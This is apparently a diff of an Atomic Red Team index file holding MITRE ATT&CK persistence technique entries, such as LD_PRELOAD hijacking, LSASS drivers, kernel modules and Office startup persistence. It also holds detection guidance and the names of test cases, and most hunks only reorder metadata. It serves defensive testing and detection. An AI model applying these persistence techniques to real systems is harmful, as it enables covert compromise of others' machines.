Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1062:
technique:
@@ -10918,21 +11134,21 @@ persistence:
phase_name: persistence
modified: '2020-03-30T13:44:04.712Z'
created: '2017-05-31T21:30:50.958Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - System calls
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing
analysis. Hypervisors emulate certain CPU instructions that would normally
be executed by the hardware. If an instruction takes orders of magnitude longer
to execute than normal on a system that should not contain a hypervisor, one
may be present. (Citation: virtualization.info 2006)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - System calls
+ x_mitre_version: '2.0'
atomic_tests: []
T1546.012:
technique:
@@ -10998,25 +11214,25 @@ persistence:
phase_name: persistence
modified: '2020-03-24T19:39:50.839Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+
+ Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
- API monitoring
- Windows event logs
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
- Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -11118,21 +11334,21 @@ persistence:
phase_name: persistence
modified: '2020-03-25T22:47:34.137Z'
created: '2019-09-04T12:04:03.552Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Asset management
+ x_mitre_detection: Monitor interactions with images and containers by users
+ to identify ones that are added or modified anomalously.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_platforms:
- GCP
- Azure
- AWS
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Monitor interactions with images and containers by users
- to identify ones that are added or modified anomalously.
- x_mitre_data_sources:
- - File monitoring
- - Asset management
- x_mitre_is_subtechnique: false
atomic_tests: []
T1547.006:
technique:
@@ -11180,6 +11396,11 @@ persistence:
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
source_name: Securelist Ventir
+ - source_name: Trend Micro Skidmap
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
+ description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
+ Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
+ Retrieved June 4, 2020.
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
@@ -11199,7 +11420,7 @@ persistence:
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
- Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+ Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
type: attack-pattern
kill_chain_phases:
@@ -11207,27 +11428,28 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:14:29.149Z'
+ modified: '2020-06-30T21:23:15.188Z'
created: '2020-01-24T17:42:23.339Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_contributors:
- - Jeremy Galloway
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: |-
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.
- Adversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
- x_mitre_permissions_required:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Jeremy Galloway
+ - Red Canary
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
@@ -11304,29 +11526,31 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:50:36.235Z'
created: '2020-01-24T14:21:52.750Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor processes for those that may be used to modify binary
+ headers. Monitor file systems for changes to application binaries and invalid
+ checksums/signatures. Changes to binaries that do not line up with application
+ updates or patches are also extremely suspicious.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- Binary file metadata
- x_mitre_detection: Monitor processes for those that may be used to modify binary
- headers. Monitor file systems for changes to application binaries and invalid
- checksums/signatures. Changes to binaries that do not line up with application
- updates or patches are also extremely suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -11335,6 +11559,10 @@ persistence:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -11360,20 +11588,20 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -11439,6 +11667,23 @@ persistence:
name: bash
T1547.008:
technique:
+ created: '2020-01-24T18:38:55.801Z'
+ modified: '2020-03-25T16:52:26.567Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
+ description: |-
+ Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
+
+ Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
+ name: LSASS Driver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547.008
@@ -11459,23 +11704,6 @@ persistence:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Driver
- description: |-
- Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
-
- Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:52:26.567Z'
- created: '2020-01-24T18:38:55.801Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -11566,20 +11794,20 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:11:45.513Z'
created: '2020-01-17T16:10:58.592Z'
- x_mitre_platforms:
- - macOS
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitor Launch Agent creation through additional plist files
and utilities such as Objective-See’s KnockKnock application. Launch Agents
also require files on disk for persistence which can also be monitored via
other file monitoring applications.
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_platforms:
+ - macOS
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -11669,18 +11897,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:27:49.609Z'
created: '2020-01-17T19:23:15.227Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: 'Monitor for launch daemon creation or modification through
- plist files and utilities such as Objective-See''s KnockKnock application. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Monitor for launch daemon creation or modification through
+ plist files and utilities such as Objective-See''s KnockKnock application. '
+ x_mitre_platforms:
+ - macOS
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -11748,12 +11976,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -11764,11 +11991,12 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -11824,25 +12052,25 @@ persistence:
phase_name: persistence
modified: '2020-03-23T18:04:20.780Z'
created: '2020-01-28T13:50:22.506Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor for processes and command-line parameters associated
with local account creation, such as net user /add or useradd.
Collect data on account creation within a network. Event ID 4720 is generated
when a user account is created on a Windows system. (Citation: Microsoft User
Creation Event) Perform regular audits of local system accounts to detect
suspicious accounts that may have been created by an adversary.'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Authentication logs
+ - Windows event logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1136.001
atomic_tests:
- name: Create a user account on a Linux system
@@ -12023,21 +12251,21 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037.002:
technique:
@@ -12078,18 +12306,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.786Z'
created: '2020-01-10T16:01:15.995Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -12143,17 +12371,17 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:03.153Z'
created: '2020-01-10T03:43:37.211Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
x_mitre_detection: |-
Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.
- x_mitre_data_sources:
- - Process monitoring
- - Windows Registry
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -12215,25 +12443,25 @@ persistence:
phase_name: persistence
modified: '2020-03-24T18:28:07.793Z'
created: '2020-01-24T14:26:51.207Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
in most environments. Monitor process executions and investigate any child
processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh
registry key for any new or suspicious entries that do not correlate with
known system files or benign software. (Citation: Demaske Netsh Persistence)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ - DLL monitoring
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -12287,28 +12515,29 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:25.625Z'
created: '2020-01-10T18:01:03.666Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1137:
technique:
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ created: '2017-12-14T16:46:06.044Z'
+ modified: '2020-06-25T17:48:09.417Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1137
@@ -12339,14 +12568,13 @@ persistence:
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-03-26T17:36:16.211Z'
- created: '2017-12-14T16:46:06.044Z'
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ name: Office Application Startup
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
x_mitre_is_subtechnique: false
x_mitre_version: '1.2'
x_mitre_contributors:
@@ -12426,8 +12654,8 @@ persistence:
file created by default, but one can be added that will automatically be loaded.(Citation:
enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates
may also be stored and pulled from remote locations.(Citation: GlobalDotName
- Jun 2019) \n\nWord Normal.dotm location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel
- Personal.xlsb location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries
+ Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel
+ Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries
may also change the location of the base template to point to their own by
hijacking the application's search order, e.g. Word 2016 will first look for
Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\,
@@ -12444,16 +12672,13 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:49:21.679Z'
+ modified: '2020-06-25T17:48:08.916Z'
created: '2019-11-07T20:29:17.788Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - File monitoring
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -12463,11 +12688,14 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.002:
technique:
@@ -12503,9 +12731,17 @@ persistence:
phase_name: persistence
modified: '2020-03-20T15:27:51.559Z'
created: '2019-11-07T19:44:04.475Z'
- x_mitre_platforms:
- - Windows
- - Office 365
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - Office 2007, 2010, 2013, and 2016
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: |-
+ Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
+
+ Consider monitoring Office processes for anomalous DLL loads.
x_mitre_data_sources:
- DLL monitoring
- Loaded DLLs
@@ -12513,17 +12749,9 @@ persistence:
- Process command-line parameters
- File monitoring
- Windows Registry
- x_mitre_detection: |-
- Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
-
- Consider monitoring Office processes for anomalous DLL loads.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Office 2007, 2010, 2013, and 2016
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.003:
technique:
@@ -12560,22 +12788,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:35:15.823Z'
created: '2019-11-07T20:06:02.624Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
